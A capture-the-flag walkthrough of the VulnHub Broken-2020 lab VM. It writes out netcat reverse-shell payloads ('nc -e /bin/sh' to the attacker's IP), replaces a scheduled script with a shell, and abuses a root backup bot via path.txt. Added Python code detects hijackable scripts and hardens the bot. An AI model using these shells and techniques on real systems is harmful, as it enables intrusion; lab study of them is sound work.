[VLN] Broken-2020

Today we are going to hack the VulnHub machine called Broken-2020. You can download it from the following link: https://www.vulnhub.com/entry/broken-2020-1,470/
  • Video
  • Enumeration
  • We start with an nmap scan of all TCP ports to see which ones are open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.32
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 15:53 CEST
    Nmap scan report for 192.168.1.32
    Host is up (0.00070s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
    |   256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
    |_  256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Coming Soon
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds
    Only SSH and Apache are exposed, so we check whether the web server has anything interesting by brute-forcing directories.
    sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/ -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.32/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/05/07 16:02:48 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /cms (Status: 301)
    /fonts (Status: 301)
    /images (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/05/07 16:02:58 Finished
    ===============================================================
    We browse to http://192.168.1.32/cms/ and press the button. "Something" gets triggered, which has "hacked" the CMS... Going back to http://192.168.1.32/cms/ we get flag1. Now we brute-force the cms directory to see what else is there.
    sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/cms -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.32/cms
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/05/07 16:02:19 Starting gobuster
    ===============================================================
    /.htpasswd (Status: 403)
    /.htaccess (Status: 403)
    /cc (Status: 301)
    ===============================================================
    2020/05/07 16:02:27 Finished
    ===============================================================
  • Exploitation
  • /cc is an eye-catching folder, so we open http://192.168.1.32/cms/cc. The page asks us for an IP and a port... We start an HTTP server listening on our machine and submit our server's IP and port.
    sml@Cassandra:~$ python -m SimpleHTTPServer
    Serving HTTP on 0.0.0.0 port 8000 ...
    192.168.1.32 - - [07/May/2020 16:00:21] "GET /d499dda8cfb8e278c0fa0bb9732a92d5.sh HTTP/1.0" 200 -
    The target connects back to our server and requests a .sh file: the page is fetching a script from whatever host we name and running it. We create a file with the exact name it requested, containing a reverse shell back to our machine.
    sml@Cassandra:~$ echo "nc -e /bin/sh 192.168.1.148 5555" > d499dda8cfb8e278c0fa0bb9732a92d5.sh
  • Low shell
  • We start a listener on the port from the payload and submit the form again; the script is fetched and executed as the web server user.
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 52750
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    Now that we have a shell, we upgrade it to a pty and explore the system a bit.
    python -c 'import pty; pty.spawn("/bin/sh")'
    $ cd /home
    $ ls
    alice
    $ cd alice
    $ ls
    flag.txt  note.txt  script
    $ cat flag.txt
    cat flag.txt
    {FLAG2:**Robing the rober**}
    $ cat note.txt
    Alice, Please do not install TrustMeCMS, I need check the source before
    PS: I created a script to clear apache log during the tests
    root
    We look at the script folder and at the script root mentions in the note.
    $ cd /home/alice/script
    $ cat log.py
    cat log.py
    #!/usr/bin/python2.7
    import requests
    import os
    import datetime

    """
    #Juste in case I want stop this script remotly
    r = requests.get("https://pastebin.com/raw/9vzu2CA5")
    cmd=str(r.text)
    check ="stopit"
    if check == cmd :
        os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')
    """

    path="/var/log/apache2"
    dir = os.listdir(path)
    date = str(datetime.datetime.now())
    for logfile in dir :
        clear = open(path+"/"+logfile, "w")
        clear.truncate(0)
        clear.close()
    logfile = open("/home/alice/script/clear.log","w")
    logfile.write("last clear apache log "+date)
    logfile.close()
    The script is run periodically (clear.log records each run), and the directory is writable by www-data even though the note says root wrote the script. We can therefore rename log.py out of the way and drop a Python script with the same name that opens a second reverse shell to our machine, to be run with whatever privileges the scheduled job has.
    $ mv log.py log.bck
    $ echo "#!/usr/bin/python2.7" >> log.py
    $ echo "import os" >> log.py
    $ echo "os.system('nc -e /bin/sh 192.168.1.148 5556')" >> log.py
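    The step above works because of the directory's permissions, not the file's: log.py itself may well be root-owned and read-only, but a writable parent lets us rename it aside and plant a replacement. The check below is an added example (not part of the original write-up or the VM): it classifies every script in the given directories as takeover-able either through the file's own mode bits or through a writable parent, and honours the sticky bit, which is the one directory mode that blocks the rename trick. The layout it builds in a temporary directory stands in for /home/alice/script and is constructed for the demo; it judges permissions for a uid that owns none of the files, as www-data would be.

```python
import os
import shutil
import stat
import tempfile


def can_write(path, uid, gids):
    """Permission-bit check: may an identity with this uid and these gids
    write `path`?  Root's override and POSIX ACLs are ignored on purpose:
    this is the view from an unprivileged shell like www-data's."""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def can_replace(directory, path, uid, gids):
    """Can the identity rename `path` aside and drop a new file in its place?
    That needs write on the directory; a sticky directory (1777, like /tmp)
    further restricts rename/unlink to the file's owner."""
    if not can_write(directory, uid, gids):
        return False
    if os.stat(directory).st_mode & stat.S_ISVTX:
        return os.stat(path).st_uid == uid
    return True


def hijackable_scripts(directories, uid=None, gids=None):
    """Map script path -> reason for every regular file under `directories`
    that the identity could take over, either by writing the file itself or
    by replacing it through a writable parent (the `mv log.py log.bck` trick)."""
    if uid is None:
        uid = os.getuid()
    if gids is None:
        gids = set(os.getgroups()) | {os.getgid()}
    found = {}
    for directory in directories:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not os.path.isfile(path):
                continue
            if can_write(path, uid, gids):
                found[path] = "file writable"
            elif can_replace(directory, path, uid, gids):
                found[path] = "parent directory writable (rename/replace)"
    return found


def demo():
    """Constructed layout standing in for /home/alice/script (these are not
    the VM's files), judged for a uid that owns nothing in it."""
    base = tempfile.mkdtemp(prefix="script-")
    log_py = os.path.join(base, "log.py")
    debug_py = os.path.join(base, "debug.py")
    for path in (log_py, debug_py):
        with open(path, "w") as fh:
            fh.write("#!/usr/bin/python2.7\n")
    os.chmod(log_py, 0o644)    # root-style: only the owner may write
    os.chmod(debug_py, 0o666)  # sloppy: world-writable
    stranger = os.getuid() + 1  # a uid that owns none of the files above
    results = {}
    for label, mode in (("locked_dir", 0o755),
                        ("writable_dir", 0o777),
                        ("sticky_dir", 0o1777)):
        os.chmod(base, mode)
        hits = hijackable_scripts([base], stranger, set())
        results[label] = {os.path.basename(p): why for p, why in hits.items()}
    os.chmod(base, 0o700)
    shutil.rmtree(base)
    return results


if __name__ == "__main__":
    for label, hits in demo().items():
        print(label, hits)
```

    On the VM you would call hijackable_scripts(["/home/alice/script"]) from the www-data shell with the defaults, which use your real uid and groups; the three modes in demo() show that log.py only becomes a target once its directory is writable, and stops being one again if the directory is sticky.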
    We start a listener for the new shell... and after a while the scheduled job runs our replacement. It turns out the job runs as alice, not root.
    sml@Cassandra:~$ nc -nlvp 5556
    listening on [any] 5556 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 46634
    python -c 'import pty; pty.spawn("/bin/sh")'
    $ id
    uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
    We explore again; alice's home now has a backup directory that www-data could not see.
    $ cd /home/alice
    $ ls
    backup  flag.txt  note.txt  script
    $ cd backup
    $ ls
    flag.txt  logbot.log  note.txt  path.txt
    $ cat flag.txt
    {FLAG3:**Power of snak**}
    $ cat note.txt
    cat note.txt
    Alice we have been hacked !
    Please put the path of the website backup directory in path.txt, my bot will do the rest
    thx
    root
    The note tells us to write the directory we want backed up into path.txt, and a bot running as root will copy it. Nothing says the bot checks that the path is actually the website, so we ask it for /root :) and shortly after...
  • (root)flag.txt
    $ echo "/root" > path.txt
    $ ls
    flag.txt  logbot.log  note.txt  path.txt  root
    $ cd root
    $ ls
    flag.txt  log.txt  test.py
    $ cat flag.txt
    Congratulation for the root flag !
             _________
            / ======= \
           / __________\
          | ___________ |
          | | -root-  | |
          | |         | |
          | |_________| |_________________________________________________
          \=____________/   enjoyed this VM ?                             )
          / """"""""""" \   I love bitcoin                               /
         / ::::::::::::: \  1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S      =D-'
        (_________________)
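    The root flag falls out of one design flaw: a privileged job takes a path from a file that a lower-privileged user controls and never checks that the path lies inside the directory it is supposed to back up. The page does not show the bot's source, so the following is an added example rather than the VM's code: backup_unsafe models the behaviour the walkthrough observed, and backup_safe is the hardened form, resolving the requested path with realpath before a containment check so that both a bare "/root" and a symlink planted inside the web root that points at /root are refused. The directory tree, file names and flag text are constructed for the demo and are not the VM's.

```python
import os
import shutil
import tempfile


def read_requested_path(path_txt):
    """Return the directory named on the first line of path.txt."""
    with open(path_txt) as fh:
        return fh.readline().strip()


def backup_unsafe(path_txt, backup_dir):
    """Model of the VM's bot: copy whatever directory path.txt names.

    Run as root with no validation, so writing /root into path.txt drops a
    copy of /root into alice's backup directory.  Returns the copy's path.
    """
    src = read_requested_path(path_txt)
    dst = os.path.join(backup_dir, os.path.basename(os.path.normpath(src)))
    shutil.copytree(src, dst)
    return dst


def backup_safe(path_txt, backup_dir, allowed_root):
    """Hardened bot: only directories inside `allowed_root` are copied.

    realpath() resolves '..' and symlinks before the containment check, so a
    symlink inside the web root that points at /root is refused too, and
    symlinks=True stops copytree from following links while copying.
    """
    root = os.path.realpath(allowed_root)
    src = os.path.realpath(read_requested_path(path_txt))
    if os.path.commonpath([src, root]) != root:
        raise PermissionError("%s is outside %s" % (src, root))
    if not os.path.isdir(src):
        raise FileNotFoundError(src)
    dst = os.path.join(backup_dir, os.path.basename(src))
    shutil.copytree(src, dst, symlinks=True)
    return dst


def build_fixture():
    """Constructed directory tree (not the VM's): a web root, a private
    directory playing the part of /root, a symlink escaping the web root,
    and alice's backup directory that will hold path.txt."""
    base = tempfile.mkdtemp(prefix="broken2020-")
    webroot = os.path.join(base, "var", "www", "html")
    private = os.path.join(base, "root")
    backup = os.path.join(base, "home", "alice", "backup")
    for d in (webroot, private, backup):
        os.makedirs(d)
    with open(os.path.join(webroot, "index.html"), "w") as fh:
        fh.write("<h1>Coming Soon</h1>\n")
    with open(os.path.join(private, "flag.txt"), "w") as fh:
        fh.write("placeholder, not the real flag\n")
    os.symlink(private, os.path.join(webroot, "escape"))
    return {"base": base, "webroot": webroot, "private": private,
            "backup": backup, "path_txt": os.path.join(backup, "path.txt")}


def request(path_txt, target):
    """What `echo "/root" > path.txt` does in the walkthrough."""
    with open(path_txt, "w") as fh:
        fh.write(target + "\n")


def refused(fn):
    """True if calling fn() raises PermissionError."""
    try:
        fn()
    except PermissionError:
        return True
    return False


def run_demo():
    fx = build_fixture()
    out = {}
    # 1. The intended use from root's note: back up the website directory.
    request(fx["path_txt"], fx["webroot"])
    dst = backup_unsafe(fx["path_txt"], os.path.join(fx["backup"], "u1"))
    out["unsafe_copies_webroot"] = os.path.isfile(os.path.join(dst, "index.html"))
    dst = backup_safe(fx["path_txt"], os.path.join(fx["backup"], "s1"), fx["webroot"])
    out["safe_copies_webroot"] = os.path.isfile(os.path.join(dst, "index.html"))
    # 2. The walkthrough's move: ask for the private directory instead.
    request(fx["path_txt"], fx["private"])
    dst = backup_unsafe(fx["path_txt"], os.path.join(fx["backup"], "u2"))
    out["unsafe_leaks_flag"] = os.path.isfile(os.path.join(dst, "flag.txt"))
    out["safe_refuses_private"] = refused(
        lambda: backup_safe(fx["path_txt"], os.path.join(fx["backup"], "s2"), fx["webroot"]))
    # 3. A path that looks inside the web root but resolves outside it.
    request(fx["path_txt"], os.path.join(fx["webroot"], "escape"))
    out["safe_refuses_symlink"] = refused(
        lambda: backup_safe(fx["path_txt"], os.path.join(fx["backup"], "s3"), fx["webroot"]))
    shutil.rmtree(fx["base"])
    return out


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(name, ok)
```

    The containment check compares realpath results with os.path.commonpath rather than a string prefix, so a request for /var/www/html2 is not mistaken for something under /var/www/html; and even the safe bot should not write its copy into a directory the low-privileged user owns, since the walkthrough's whole chain started with a root-driven job touching files in alice's home.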